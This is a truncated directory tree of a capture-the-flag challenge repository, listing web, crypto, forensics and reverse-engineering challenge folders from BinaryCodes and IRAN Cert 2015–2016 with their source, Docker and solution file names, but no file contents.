├── Challenges ├── BinaryCodes │ ├── README.md │ └── Web │ │ ├── easy-lfi1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── apache-config.conf │ │ ├── app │ │ │ ├── favicon.ico │ │ │ ├── index.php │ │ │ ├── pages │ │ │ │ ├── contact-bedford.php │ │ │ │ ├── page.php │ │ │ │ ├── projects-bedford.php │ │ │ │ └── read-me-bedford.php │ │ │ ├── robots.txt │ │ │ ├── somerandomtext │ │ │ │ └── flag.php │ │ │ ├── take-action-bedford.html │ │ │ └── what-we-do-bedford.html │ │ └── solution │ │ │ └── README.md │ │ ├── hard-ssrf1 │ │ ├── README.md │ │ ├── cgi-edge │ │ │ ├── Dockerfile │ │ │ ├── LICENSE │ │ │ ├── README.md │ │ │ ├── apache2 │ │ │ │ ├── conf-available │ │ │ │ │ └── serve-cgi-bin.conf │ │ │ │ ├── mods-available │ │ │ │ │ └── mime.conf │ │ │ │ └── sites-available │ │ │ │ │ └── 000-default.conf │ │ │ ├── cgi-bin │ │ │ │ └── index.py │ │ │ ├── public_html │ │ │ │ └── test.html │ │ │ └── python-patch │ │ │ │ ├── client.py │ │ │ │ └── idna.py │ │ ├── docker-compose.yml │ │ ├── php-flag │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── apache │ │ │ │ └── 000-default.conf │ │ │ ├── data │ │ │ │ ├── data │ │ │ │ └── db │ │ │ │ │ ├── board │ │ │ │ │ ├── data │ │ │ │ │ ├── flag │ │ │ │ │ ├── log │ │ │ │ │ └── users │ │ │ └── start.sh │ │ └── solution │ │ │ ├── README.md │ │ │ ├── git-relay-server.py │ │ │ └── solver.py │ │ ├── medium-race1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── app │ │ │ ├── connect.php │ │ │ ├── css │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.min.css │ │ │ │ ├── logo-nav.css │ │ │ │ └── signin.css │ │ │ ├── defcon │ │ │ │ └── about.txt │ │ │ ├── details.php │ │ │ ├── flag.php │ │ │ ├── fonts │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ ├── header.php │ │ │ ├── js │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── jquery.js │ │ │ ├── login.php │ │ │ ├── logout.php │ │ │ ├── register.php │ │ │ ├── robots.txt │ │ │ ├── setup.php │ │ │ ├── test │ │ │ │ ├── test.zip │ │ │ │ ├── test1 │ │ │ │ └── test1.zip │ │ │ ├── title_section.php │ │ │ ├── upload.php │ │ │ ├── v.conf │ │ │ └── welcome.php │ │ ├── docker-compose.yml │ │ ├── etc │ │ │ ├── apache │ │ │ │ └── default │ │ │ └── mysql │ │ │ │ └── mysqld.conf │ │ ├── scripts │ │ │ └── init.sql │ │ └── solution │ │ │ ├── README.md │ │ │ └── race.py │ │ ├── medium-xss1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── docker-compose.yml │ │ ├── etc │ │ │ ├── mysql │ │ │ │ └── mysqld.conf │ │ │ └── nginx │ │ │ │ └── default │ │ ├── init.sh │ │ ├── nginx.conf │ │ ├── nginx │ │ │ ├── Dockerfile │ │ │ └── sites-enabled │ │ │ │ └── django_project │ │ ├── scripts │ │ │ ├── init.sql │ │ │ ├── init_database.sh │ │ │ └── run.sh │ │ ├── solution │ │ │ └── README.md │ │ └── website │ │ │ ├── .idea │ │ │ ├── markdown-exported-files.xml │ │ │ ├── markdown-navigator.xml │ │ │ ├── markdown-navigator │ │ │ │ └── profiles_settings.xml │ │ │ ├── misc.xml │ │ │ ├── modules.xml │ │ │ ├── website.iml │ │ │ └── workspace.xml │ │ │ ├── Dockerfile │ │ │ ├── app │ │ │ ├── __init__.py │ │ │ ├── admin.py │ │ │ ├── app_settings.py │ │ │ ├── apps.py │ │ │ ├── forms.py │ │ │ ├── management │ │ │ │ ├── __init__.py │ │ │ │ └── commands │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── check_profiles.py │ │ │ │ │ └── initiate_database.py │ │ │ ├── migrations │ │ │ │ ├── 0001_initial.py │ │ │ │ ├── 0002_user_description.py │ │ │ │ ├── 0003_auto_20180120_0558.py │ │ │ │ ├── 0004_auto_20180120_1806.py │ │ │ │ └── __init__.py │ │ │ ├── mixins.py │ │ │ ├── models.py │ │ │ ├── static │ │ │ │ └── app │ │ │ │ │ ├── css │ │ │ │ │ ├── bootstrap-rtl.min.css │ │ │ │ │ ├── bootstrap.min.css │ │ │ │ │ └── small-business.css │ │ │ │ │ ├── font-awesome │ │ │ │ │ ├── css │ │ │ │ │ │ ├── font-awesome.css │ │ │ │ │ │ ├── font-awesome.css.orig │ │ │ │ │ │ ├── font-awesome.min.css │ │ │ │ │ │ └── font-awesome.min.css.orig │ │ │ │ │ └── fonts │ │ │ │ │ │ ├── fontawesome-webfont.eot_ │ │ │ │ │ │ ├── fontawesome-webfont.eot_v=4.3.0 │ │ │ │ │ │ ├── fontawesome-webfont.svg_v=4.3.0 │ │ │ │ │ │ ├── fontawesome-webfont.ttf_v=4.3.0 │ │ │ │ │ │ ├── fontawesome-webfont.woff2_v=4.3.0 │ │ │ │ │ │ └── fontawesome-webfont.woff_v=4.3.0 │ │ │ │ │ ├── fonts │ │ │ │ │ ├── IRANSans-Bold-web.ttf │ │ │ │ │ ├── IRANSans-Bold-web.woff │ │ │ │ │ ├── IRANSans-Light-web.ttf │ │ │ │ │ ├── IRANSans-Light-web.woff │ │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ │ ├── glyphicons-halflings-regular.eot_ │ │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ │ │ ├── img │ │ │ │ │ └── no-menn.png │ │ │ │ │ └── js │ │ │ │ │ ├── bootstrap.min.js │ │ │ │ │ └── jquery.js │ │ │ ├── templates │ │ │ │ └── app │ │ │ │ │ ├── base.html │ │ │ │ │ ├── flag.html │ │ │ │ │ ├── index.html │ │ │ │ │ ├── login.html │ │ │ │ │ ├── profile.html │ │ │ │ │ ├── profile_edit.html │ │ │ │ │ └── register.html │ │ │ ├── templatetags │ │ │ │ ├── __init__.py │ │ │ │ └── app_tags.py │ │ │ ├── tests.py │ │ │ ├── urls.py │ │ │ └── views.py │ │ │ ├── avatar │ │ │ └── test.jpg │ │ │ ├── manage.py │ │ │ ├── media │ │ │ └── avatar │ │ │ │ ├── empty.jpg │ │ │ │ ├── test.gif │ │ │ │ ├── test.js │ │ │ │ ├── test.py │ │ │ │ ├── test_0GWwxOT.gif │ │ │ │ ├── test_27ocI4M.gif │ │ │ │ ├── test_7zFsDhg.gif │ │ │ │ ├── test_APyOfLm.gif │ │ │ │ ├── test_B80PliW.gif │ │ │ │ ├── test_BfFj8MW.gif │ │ │ │ ├── test_NeifzZ3.gif │ │ │ │ ├── test_Z8O46N0.gif │ │ │ │ ├── test_c9sWenV.gif │ │ │ │ ├── test_cNqcRyd.gif │ │ │ │ ├── test_dnTjIRn.gif │ │ │ │ ├── test_fjTRkgM.js │ │ │ │ ├── test_lV0APfy.gif │ │ │ │ ├── test_nAAq7iu.gif │ │ │ │ ├── test_osvKkTn.gif │ │ │ │ ├── test_pzwRb0m.gif │ │ │ │ ├── test_vrikRjT.gif │ │ │ │ └── test_yVcPZWz.gif │ │ │ ├── package-lock.json │ │ │ ├── requirements.txt │ │ │ ├── static │ │ │ ├── admin │ │ │ │ ├── css │ │ │ │ │ ├── base.css │ │ │ │ │ ├── changelists.css │ │ │ │ │ ├── dashboard.css │ │ │ │ │ ├── fonts.css │ │ │ │ │ ├── forms.css │ │ │ │ │ ├── login.css │ │ │ │ │ ├── rtl.css │ │ │ │ │ └── widgets.css │ │ │ │ ├── fonts │ │ │ │ │ ├── LICENSE.txt │ │ │ │ │ ├── README.txt │ │ │ │ │ ├── Roboto-Bold-webfont.woff │ │ │ │ │ ├── Roboto-Light-webfont.woff │ │ │ │ │ └── Roboto-Regular-webfont.woff │ │ │ │ ├── img │ │ │ │ │ ├── LICENSE │ │ │ │ │ ├── README.txt │ │ │ │ │ ├── calendar-icons.svg │ │ │ │ │ ├── gis │ │ │ │ │ │ ├── move_vertex_off.svg │ │ │ │ │ │ └── move_vertex_on.svg │ │ │ │ │ ├── icon-addlink.svg │ │ │ │ │ ├── icon-alert.svg │ │ │ │ │ ├── icon-calendar.svg │ │ │ │ │ ├── icon-changelink.svg │ │ │ │ │ ├── icon-clock.svg │ │ │ │ │ ├── icon-deletelink.svg │ │ │ │ │ ├── icon-no.svg │ │ │ │ │ ├── icon-unknown-alt.svg │ │ │ │ │ ├── icon-unknown.svg │ │ │ │ │ ├── icon-yes.svg │ │ │ │ │ ├── inline-delete.svg │ │ │ │ │ ├── search.svg │ │ │ │ │ ├── selector-icons.svg │ │ │ │ │ ├── sorting-icons.svg │ │ │ │ │ ├── tooltag-add.svg │ │ │ │ │ └── tooltag-arrowright.svg │ │ │ │ └── js │ │ │ │ │ ├── SelectBox.js │ │ │ │ │ ├── SelectFilter2.js │ │ │ │ │ ├── actions.js │ │ │ │ │ ├── actions.min.js │ │ │ │ │ ├── admin │ │ │ │ │ ├── DateTimeShortcuts.js │ │ │ │ │ └── RelatedObjectLookups.js │ │ │ │ │ ├── calendar.js │ │ │ │ │ ├── cancel.js │ │ │ │ │ ├── change_form.js │ │ │ │ │ ├── collapse.js │ │ │ │ │ ├── collapse.min.js │ │ │ │ │ ├── core.js │ │ │ │ │ ├── inlines.js │ │ │ │ │ ├── inlines.min.js │ │ │ │ │ ├── jquery.init.js │ │ │ │ │ ├── popup_response.js │ │ │ │ │ ├── prepopulate.js │ │ │ │ │ ├── prepopulate.min.js │ │ │ │ │ ├── prepopulate_init.js │ │ │ │ │ ├── timeparse.js │ │ │ │ │ ├── urlify.js │ │ │ │ │ └── vendor │ │ │ │ │ ├── jquery │ │ │ │ │ ├── LICENSE-JQUERY.txt │ │ │ │ │ ├── jquery.js │ │ │ │ │ └── jquery.min.js │ │ │ │ │ └── xregexp │ │ │ │ │ ├── LICENSE-XREGEXP.txt │ │ │ │ │ ├── xregexp.js │ │ │ │ │ └── xregexp.min.js │ │ │ └── app │ │ │ │ ├── css │ │ │ │ ├── bootstrap-rtl.min.css │ │ │ │ ├── bootstrap.min.css │ │ │ │ └── small-business.css │ │ │ │ ├── font-awesome │ │ │ │ ├── css │ │ │ │ │ ├── font-awesome.css │ │ │ │ │ ├── font-awesome.css.orig │ │ │ │ │ ├── font-awesome.min.css │ │ │ │ │ └── font-awesome.min.css.orig │ │ │ │ └── fonts │ │ │ │ │ ├── fontawesome-webfont.eot_ │ │ │ │ │ ├── fontawesome-webfont.eot_v=4.3.0 │ │ │ │ │ ├── fontawesome-webfont.svg_v=4.3.0 │ │ │ │ │ ├── fontawesome-webfont.ttf_v=4.3.0 │ │ │ │ │ ├── fontawesome-webfont.woff2_v=4.3.0 │ │ │ │ │ └── fontawesome-webfont.woff_v=4.3.0 │ │ │ │ ├── fonts │ │ │ │ ├── IRANSans-Bold-web.ttf │ │ │ │ ├── IRANSans-Bold-web.woff │ │ │ │ ├── IRANSans-Light-web.ttf │ │ │ │ ├── IRANSans-Light-web.woff │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ ├── glyphicons-halflings-regular.eot_ │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ │ ├── img │ │ │ │ └── no-menn.png │ │ │ │ └── js │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── jquery.js │ │ │ └── website │ │ │ ├── __init__.py │ │ │ ├── settings.py │ │ │ ├── urls.py │ │ │ └── wsgi.py │ │ └── supereasy-phpbug1 │ │ ├── Dockerfile │ │ ├── README.md │ │ ├── app │ │ ├── index.php │ │ └── source.php │ │ └── etc │ │ └── apache │ │ └── default ├── IRAN Cert │ ├── 2015 │ │ ├── README.md │ │ ├── accesslog │ │ │ ├── README.md │ │ │ └── access.log.zip │ │ ├── helloadmin │ │ │ ├── README.md │ │ │ └── sourcefiles │ │ │ │ ├── admin.php │ │ │ │ ├── connect.php │ │ │ │ ├── login.php │ │ │ │ ├── logout.php │ │ │ │ └── user.php │ │ ├── hijacked │ │ │ ├── README.md │ │ │ ├── hijacked.pcap.pcapng │ │ │ ├── images │ │ │ │ ├── 1.png │ │ │ │ ├── 10.png │ │ │ │ ├── 11.png │ │ │ │ ├── 12.png │ │ │ │ ├── 2.png │ │ │ │ ├── 3.png │ │ │ │ ├── 4.png │ │ │ │ ├── 5.png │ │ │ │ ├── 6.png │ │ │ │ ├── 7.png │ │ │ │ ├── 8.png │ │ │ │ └── 9.png │ │ │ └── sourcefiles │ │ │ │ ├── comments.php │ │ │ │ ├── connect.php │ │ │ │ ├── css │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.min.css │ │ │ │ ├── logo-nav.css │ │ │ │ └── signin.css │ │ │ │ ├── ctfs.php │ │ │ │ ├── defcon.php │ │ │ │ ├── defcon │ │ │ │ └── about.txt │ │ │ │ ├── details.php │ │ │ │ ├── fonts │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ │ ├── js │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── jquery.js │ │ │ │ ├── login.php │ │ │ │ ├── logout.php │ │ │ │ ├── private │ │ │ │ ├── check_session.php │ │ │ │ └── create_session.php │ │ │ │ ├── register.php │ │ │ │ ├── robots.txt │ │ │ │ ├── stuff │ │ │ │ ├── header.php │ │ │ │ ├── rand.php │ │ │ │ └── salt.php │ │ │ │ └── welcome.php │ │ ├── maze │ │ │ ├── README.md │ │ │ └── sourcefiles │ │ │ │ ├── manage.py │ │ │ │ ├── maze │ │ │ │ ├── __init__.py │ │ │ │ ├── __init__.pyc │ │ │ │ ├── settings.py │ │ │ │ ├── settings.pyc │ │ │ │ ├── urls.py │ │ │ │ ├── urls.pyc │ │ │ │ ├── wsgi.py │ │ │ │ └── wsgi.pyc │ │ │ │ ├── maze_app │ │ │ │ ├── __init__.py │ │ │ │ ├── __init__.pyc │ │ │ │ ├── admin.py │ │ │ │ ├── admin.pyc │ │ │ │ ├── forms.py │ │ │ │ ├── forms.pyc │ │ │ │ ├── models.py │ │ │ │ ├── models.pyc │ │ │ │ ├── tests.py │ │ │ │ ├── views.py │ │ │ │ └── views.pyc │ │ │ │ ├── static │ │ │ │ ├── static_dirs │ │ │ │ │ ├── css │ │ │ │ │ │ ├── bootstrap.css │ │ │ │ │ │ ├── bootstrap.min.css │ │ │ │ │ │ └── logo-nav.css │ │ │ │ │ ├── fonts │ │ │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ │ │ └── js │ │ │ │ │ │ ├── bootstrap.js │ │ │ │ │ │ ├── bootstrap.min.js │ │ │ │ │ │ └── jquery.js │ │ │ │ └── static_root │ │ │ │ │ ├── admin │ │ │ │ │ ├── css │ │ │ │ │ │ ├── base.css │ │ │ │ │ │ ├── changelists.css │ │ │ │ │ │ ├── dashboard.css │ │ │ │ │ │ ├── forms.css │ │ │ │ │ │ ├── ie.css │ │ │ │ │ │ ├── login.css │ │ │ │ │ │ ├── rtl.css │ │ │ │ │ │ └── widgets.css │ │ │ │ │ ├── img │ │ │ │ │ │ ├── changelist-bg.gif │ │ │ │ │ │ ├── changelist-bg_rtl.gif │ │ │ │ │ │ ├── default-bg-reverse.gif │ │ │ │ │ │ ├── default-bg.gif │ │ │ │ │ │ ├── deleted-overlay.gif │ │ │ │ │ │ ├── gis │ │ │ │ │ │ │ ├── move_vertex_off.png │ │ │ │ │ │ │ └── move_vertex_on.png │ │ │ │ │ │ ├── icon-no.gif │ │ │ │ │ │ ├── icon-unknown.gif │ │ │ │ │ │ ├── icon-yes.gif │ │ │ │ │ │ ├── icon_addlink.gif │ │ │ │ │ │ ├── icon_alert.gif │ │ │ │ │ │ ├── icon_calendar.gif │ │ │ │ │ │ ├── icon_changelink.gif │ │ │ │ │ │ ├── icon_clock.gif │ │ │ │ │ │ ├── icon_deletelink.gif │ │ │ │ │ │ ├── icon_error.gif │ │ │ │ │ │ ├── icon_searchbox.png │ │ │ │ │ │ ├── icon_success.gif │ │ │ │ │ │ ├── inline-delete-8bit.png │ │ │ │ │ │ ├── inline-delete.png │ │ │ │ │ │ ├── inline-restore-8bit.png │ │ │ │ │ │ ├── inline-restore.png │ │ │ │ │ │ ├── inline-splitter-bg.gif │ │ │ │ │ │ ├── nav-bg-grabber.gif │ │ │ │ │ │ ├── nav-bg-reverse.gif │ │ │ │ │ │ ├── nav-bg-selected.gif │ │ │ │ │ │ ├── nav-bg.gif │ │ │ │ │ │ ├── selector-icons.gif │ │ │ │ │ │ ├── selector-search.gif │ │ │ │ │ │ ├── sorting-icons.gif │ │ │ │ │ │ ├── tooltag-add.png │ │ │ │ │ │ └── tooltag-arrowright.png │ │ │ │ │ └── js │ │ │ │ │ │ ├── LICENSE-JQUERY.txt │ │ │ │ │ │ ├── SelectBox.js │ │ │ │ │ │ ├── SelectFilter2.js │ │ │ │ │ │ ├── actions.js │ │ │ │ │ │ ├── actions.min.js │ │ │ │ │ │ ├── admin │ │ │ │ │ │ ├── DateTimeShortcuts.js │ │ │ │ │ │ └── RelatedObjectLookups.js │ │ │ │ │ │ ├── calendar.js │ │ │ │ │ │ ├── collapse.js │ │ │ │ │ │ ├── collapse.min.js │ │ │ │ │ │ ├── core.js │ │ │ │ │ │ ├── inlines.js │ │ │ │ │ │ ├── inlines.min.js │ │ │ │ │ │ ├── jquery.init.js │ │ │ │ │ │ ├── jquery.js │ │ │ │ │ │ ├── jquery.min.js │ │ │ │ │ │ ├── prepopulate.js │ │ │ │ │ │ ├── prepopulate.min.js │ │ │ │ │ │ ├── related-widget-wrapper.js │ │ │ │ │ │ ├── timeparse.js │ │ │ │ │ │ └── urlify.js │ │ │ │ │ ├── css │ │ │ │ │ ├── bootstrap.css │ │ │ │ │ ├── bootstrap.min.css │ │ │ │ │ └── logo-nav.css │ │ │ │ │ ├── fonts │ │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ │ │ └── js │ │ │ │ │ ├── bootstrap.js │ │ │ │ │ ├── bootstrap.min.js │ │ │ │ │ └── jquery.js │ │ │ │ └── templates │ │ │ │ ├── admin.html │ │ │ │ ├── base.html │ │ │ │ ├── main.html │ │ │ │ ├── session.html │ │ │ │ └── subscribe.html │ │ ├── scoreboard │ │ ├── secretdoor │ │ │ ├── README.md │ │ │ └── sourcefiles │ │ │ │ ├── connect.php │ │ │ │ ├── contact.php │ │ │ │ ├── css │ │ │ │ ├── bootstrap.css │ │ │ │ ├── bootstrap.min.css │ │ │ │ ├── logo-nav.css │ │ │ │ └── signin.css │ │ │ │ ├── fonts │ │ │ │ ├── glyphicons-halflings-regular.eot │ │ │ │ ├── glyphicons-halflings-regular.svg │ │ │ │ ├── glyphicons-halflings-regular.ttf │ │ │ │ ├── glyphicons-halflings-regular.woff │ │ │ │ └── glyphicons-halflings-regular.woff2 │ │ │ │ ├── icon.gif │ │ │ │ ├── js │ │ │ │ ├── bootstrap.js │ │ │ │ ├── bootstrap.min.js │ │ │ │ └── jquery.js │ │ │ │ ├── login.php │ │ │ │ ├── logout.php │ │ │ │ ├── pics │ │ │ │ ├── network_security_technology_slide2.jpg │ │ │ │ ├── network_security_technology_slide3.jpg │ │ │ │ ├── network_security_technology_slide4.jpg │ │ │ │ ├── network_security_technology_slide5.jpg │ │ │ │ ├── network_security_technology_slide6.jpg │ │ │ │ └── network_security_technology_slide7.jpg │ │ │ │ ├── products │ │ │ │ └── index.php │ │ │ │ ├── profile.php │ │ │ │ ├── search.php │ │ │ │ ├── simple-php-captcha-master │ │ │ │ ├── .gitignore │ │ │ │ ├── backgrounds │ │ │ │ │ ├── 45-degree-fabric.png │ │ │ │ │ ├── cloth-alike.png │ │ │ │ │ ├── grey-sandbag.png │ │ │ │ │ ├── kinda-jean.png │ │ │ │ │ ├── polyester-lite.png │ │ │ │ │ ├── stitched-wool.png │ │ │ │ │ ├── white-carbon.png │ │ │ │ │ └── white-wave.png │ │ │ │ ├── fonts │ │ │ │ │ └── times_new_yorker.ttf │ │ │ │ ├── index.php │ │ │ │ └── simple-php-captcha.php │ │ │ │ └── welcome.php │ │ └── simpleweb │ │ │ ├── README.md │ │ │ └── sourcefiles │ │ │ ├── css.html │ │ │ ├── css │ │ │ ├── bootstrap.css │ │ │ ├── bootstrap.min.css │ │ │ ├── logo-nav.css │ │ │ └── signin.css │ │ │ ├── html.html │ │ │ ├── index.html │ │ │ ├── info │ │ │ └── javascript.html │ ├── 2016 │ │ ├── 0- FirstTimeCTFers │ │ │ ├── Crypto │ │ │ │ ├── 10pt- different bases │ │ │ │ │ ├── cipher.txt │ │ │ │ │ ├── different bases │ │ │ │ │ │ └── info.json │ │ │ │ │ └── info.txt │ │ │ │ └── 5pt- change your position │ │ │ │ │ ├── change your position │ │ │ │ │ └── info.json │ │ │ │ │ ├── cipher.txt │ │ │ │ │ ├── info.json │ │ │ │ │ └── solution.txt │ │ │ ├── Misc │ │ │ │ ├── 5pt- use your brain │ │ │ │ │ ├── data │ │ │ │ │ ├── info.txt │ │ │ │ │ └── use your brain │ │ │ │ │ │ ├── data │ │ │ │ │ │ └── info.json │ │ │ │ └── 5pt- what is your dna │ │ │ │ │ ├── cipher.txt │ │ │ │ │ ├── info.txt │ │ │ │ │ └── what is your dna │ │ │ │ │ ├── cipher.txt │ │ │ │ │ └── info.json │ │ │ ├── Reverse │ │ │ │ └── 5pt- Hardcoded flag │ │ │ │ │ ├── hardcoded flag │ │ │ │ │ ├── info.json │ │ │ │ │ └── main │ │ │ │ │ ├── info.txt │ │ │ │ │ ├── main │ │ │ │ │ └── main.c │ │ │ ├── Steg │ │ │ │ ├── 10pt- easy messaging │ │ │ │ │ ├── cipher.txt │ │ │ │ │ ├── easy messaging │ │ │ │ │ │ ├── cipher.txt │ │ │ │ │ │ └── info.json │ │ │ │ │ └── info.txt │ │ │ │ └── 5pt- hidden string │ │ │ │ │ ├── hidden string │ │ │ │ │ ├── info.json │ │ │ │ │ └── nature.jpg │ │ │ │ │ ├── info.txt │ │ │ │ │ └── nature.jpg │ │ │ └── Web │ │ │ │ └── 5pt - distinct authentication │ │ │ │ ├── distinct authentication │ │ │ │ └── info.json │ │ │ │ ├── info.txt │ │ │ │ └── main.php │ │ ├── 1- Easy │ │ │ ├── Crypto │ │ │ │ ├── 10-40pt- crypto engine │ │ │ │ │ ├── Challenge │ │ │ │ │ │ ├── ascii-art │ │ │ │ │ │ │ ├── ascii-art.zip │ │ │ │ │ │ │ ├── ascii-art │ │ │ │ │ │ │ │ ├── cipher.txt │ │ │ │ │ │ │ │ └── info.json │ │ │ │ │ │ │ ├── cipher.txt │ │ │ │ │ │ │ └── flag.txt │ │ │ │ │ │ └── vigenere │ │ │ │ │ │ │ ├── cipher.txt │ │ │ │ │ │ │ ├── easy cipher.zip │ │ │ │ │ │ │ ├── easy cipher │ │ │ │ │ │ │ ├── cipher.txt │ │ │ │ │ │ │ └── info.json │ │ │ │ │ │ │ └── flag.txt │ │ │ │ │ └── crypto engine │ │ │ │ │ │ ├── .idea │ │ │ │ │ │ ├── .name │ │ │ │ │ │ ├── crypt_server.iml │ │ │ │ │ │ ├── encodings.xml │ │ │ │ │ │ ├── misc.xml │ │ │ │ │ │ ├── modules.xml │ │ │ │ │ │ ├── scopes │ │ │ │ │ │ │ └── scope_settings.xml │ │ │ │ │ │ ├── vcs.xml │ │ │ │ │ │ └── workspace.xml │ │ │ │ │ │ ├── ascii_art_40pt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ │ ├── admin.py │ │ │ │ │ │ ├── admin.pyc │ │ │ │ │ │ ├── migrations │ │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ │ └── __init__.pyc │ │ │ │ │ │ ├── models.py │ │ │ │ │ │ ├── models.pyc │ │ │ │ │ │ ├── tests.py │ │ │ │ │ │ ├── views.py │ │ │ │ │ │ └── views.pyc │ │ │ │ │ │ ├── crypt_server │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ │ ├── settings.py │ │ │ │ │ │ ├── settings.pyc │ │ │ │ │ │ ├── urls.py │ │ │ │ │ │ ├── urls.pyc │ │ │ │ │ │ ├── wsgi.py │ │ │ │ │ │ └── wsgi.pyc │ │ │ │ │ │ ├── db.sqlite3 │ │ │ │ │ │ ├── manage.py │ │ │ │ │ │ ├── templates │ │ │ │ │ │ ├── ascii_art_index.html │ │ │ │ │ │ └── vigenere_index.html │ │ │ │ │ │ └── vigenere_10pt │ │ │ │ │ │ ├── __init__.py │ │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ │ ├── admin.py │ │ │ │ │ │ ├── migrations │ │ │ │ │ │ └── __init__.py │ │ │ │ │ │ ├── models.py │ │ │ │ │ │ ├── tests.py │ │ │ │ │ │ ├── views.py │ │ │ │ │ │ └── views.pyc │ │ │ │ ├── 30pt- rare encryption │ │ │ │ │ ├── cipher.txt │ │ │ │ │ ├── info.txt │ │ │ │ │ └── rare encryption │ │ │ │ │ │ ├── cipher.txt │ │ │ │ │ │ └── info.json │ │ │ │ └── 40pt- rsa1 │ │ │ │ │ ├── info.txt │ │ │ │ │ ├── rsa1 │ │ │ │ │ ├── data.secret │ │ │ │ │ ├── info.json │ │ │ │ │ └── rsa.dat │ │ │ │ │ └── solve.py │ │ │ ├── Forensics │ │ │ │ ├── 20pt- curroption │ │ │ │ │ ├── corroption │ │ │ │ │ │ ├── file │ │ │ │ │ │ └── info.json │ │ │ │ │ ├── file.jpe │ │ │ │ │ ├── file.jpg │ │ │ │ │ └── info.txt │ │ │ │ └── 40pt- attack1 │ │ │ │ │ ├── arp-poison │ │ │ │ │ ├── arp-poison.c │ │ │ │ │ ├── arp-scan.py │ │ │ │ │ ├── arp.py │ │ │ │ │ ├── attack.pcapng │ │ │ │ │ ├── attack1 │ │ │ │ │ ├── attack.pcapng │ │ │ │ │ └── info.json │ │ │ │ │ └── info.txt │ │ │ ├── PPC & Web │ │ │ │ └── project │ │ │ │ │ ├── .idea │ │ │ │ │ ├── .name │ │ │ │ │ ├── dataSources.ids │ │ │ │ │ ├── dataSources.local.xml │ │ │ │ │ ├── dataSources.xml │ │ │ │ │ ├── encodings.xml │ │ │ │ │ ├── misc.xml │ │ │ │ │ ├── modules.xml │ │ │ │ │ ├── project.iml │ │ │ │ │ ├── scopes │ │ │ │ │ │ └── scope_settings.xml │ │ │ │ │ ├── vcs.xml │ │ │ │ │ └── workspace.xml │ │ │ │ │ ├── app │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ ├── admin.py │ │ │ │ │ ├── admin.pyc │ │ │ │ │ ├── forms.py │ │ │ │ │ ├── forms.pyc │ │ │ │ │ ├── models.py │ │ │ │ │ ├── models.pyc │ │ │ │ │ ├── tests.py │ │ │ │ │ ├── views.py │ │ │ │ │ └── views.pyc │ │ │ │ │ ├── challenge_easy_math_40pt │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ ├── models.py │ │ │ │ │ ├── models.pyc │ │ │ │ │ ├── views.py │ │ │ │ │ └── views.pyc │ │ │ │ │ ├── challenge_prime_sum_30pt │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ ├── models.py │ │ │ │ │ ├── models.pyc │ │ │ │ │ ├── views.py │ │ │ │ │ └── views.pyc │ │ │ │ │ ├── challenge_simple_post_20pt │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ ├── models.py │ │ │ │ │ ├── models.pyc │ │ │ │ │ ├── views.py │ │ │ │ │ └── views.pyc │ │ │ │ │ ├── db.sqlite3 │ │ │ │ │ ├── manage.py │ │ │ │ │ ├── project │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ ├── settings.py │ │ │ │ │ ├── settings.pyc │ │ │ │ │ ├── urls.py │ │ │ │ │ ├── urls.pyc │ │ │ │ │ ├── wsgi.py │ │ │ │ │ └── wsgi.pyc │ │ │ │ │ └── templates │ │ │ │ │ ├── challenges │ │ │ │ │ ├── challenge_easy_math.html │ │ │ │ │ ├── challenge_prime_sum.html │ │ │ │ │ └── challenge_simple_post.html │ │ │ │ │ ├── index.html │ │ │ │ │ ├── login.html │ │ │ │ │ └── register.html │ │ │ ├── Reverse │ │ │ │ ├── 30pt- decompile me │ │ │ │ │ ├── Sources 